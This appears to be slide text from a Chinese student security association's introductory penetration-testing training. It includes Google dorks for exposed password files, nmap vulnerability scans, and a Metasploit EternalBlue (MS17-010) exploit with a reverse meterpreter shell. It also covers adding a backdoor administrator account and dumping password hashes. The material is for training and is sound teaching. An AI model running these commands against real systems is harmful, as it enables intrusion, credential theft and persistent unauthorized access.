信息安全协会 网络安全专题第一期培训 © Copyright For ISA | www.rzisa.cn
授课目录 0x01.渗透测试理论 0x02.信息搜集 0x03.漏洞发现 0x04.漏洞攻击 0x05.持续控制 0x06.url-简述 © Copyright For ISA | www.rzisa.cn
0x01 渗透测试过程 1) 目标范围划定 2) 信息收集 3) 目标发现 4) 目标枚举 5) 漏洞映射 6) 社会工程学(可选) 7) 漏洞利用 8) 提权 9) 持续控制目标 10) 文档和报告 © Copyright For ISA | www.rzisa.cn
0x02 信息搜集 1.域名注册信息 命令:whois[选择参数][必要参数] eg:whois rzpt.cn © Copyright For ISA | www.rzisa.cn
0x02 信息搜集 2.DNS分析、IP获取 命令:ping [域名] dig [域名] host [域名] © Copyright For ISA | www.rzisa.cn
0x02 信息搜集 3.利用搜索引擎 google语法 “allinurl:login password “ "Index of /admin" "Index of /password" "Index of /mail" "Index of /" +passwd "Index of /" +password.txt 辅助网站: 站长之家:http://tool.chinaz.com/ 天眼查:https://www.tianyancha.com/ © Copyright For ISA | www.rzisa.cn
0x03 漏洞发现 1.漏洞扫描 nmap可以适用于winodws,linux,mac等操作系统。Nmap是一款非 常强大的实用工具,可用于: 检测活在网络上的主机(主机发现) 检测主机上开放的端口(端口发现或枚举) 检测到相应的端口(服务发现)的软件和版本 检测操作系统,硬件地址,以及软件版本 检测脆弱性的漏洞(Nmap的脚本) © Copyright For ISA | www.rzisa.cn
nmap --script=vuln 192.168.0.xxx ·操作系统及常用端口扫描 nmap -O -PN 192.168.1.1/24 ·漏洞检测 nmap --script=vuln 192.168.0.xxx © Copyright For ISA | www.rzisa.cn
利用MS17-010漏洞入侵win7 接下来,就是翻车现场~ 0x04 漏洞攻击 MS17-010是一个安全类型的补丁,MS17-010更新修复了 Microsoft Windows中的漏洞。 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 接下来,就是翻车现场~ © Copyright For ISA | www.rzisa.cn
0x04 漏洞攻击 配置exploit msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) > set rhost 10.10.10.132 rhost => 10.10.10.132(被攻击) msf exploit(ms17_010_eternalblue) > show options 配置payload msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(ms17_010_eternalblue) > set lhost 10.10.10.131 lhost => 10.10.10.131(本机) msf exploit(ms17_010_eternalblue) > exploit © Copyright For ISA | www.rzisa.cn
win7 shell 获取管理员hash 0x05 持续控制 net user net user hacker hacker /add net localgroup administrator hacker /add 获取管理员hash hashdump 令牌冒充,上马(不演示) © Copyright For ISA | www.rzisa.cn
0x06 url访问简述 1.DNS 解析:将域名解析成 IP 地址 2.TCP 连接:TCP 三次握手 3.发送 HTTP 请求 5.浏览器解析渲染页面 6.断开连接:TCP 四次挥手 © Copyright For ISA | www.rzisa.cn
URL: (Uniform Resource Locator),统一资源定位符,用于定位互联网上资源,俗称网址。 0x06 URL访问简述 URL: (Uniform Resource Locator),统一资源定位符,用于定位互联网上资源,俗称网址。 scheme://host.domain:port/path/filename © Copyright For ISA | www.rzisa.cn
DNS:baidu.com 220.114.23.56 80 0x06 url访问简述 © Copyright For ISA | www.rzisa.cn
翻车完毕 © Copyright For ISA | www.rzisa.cn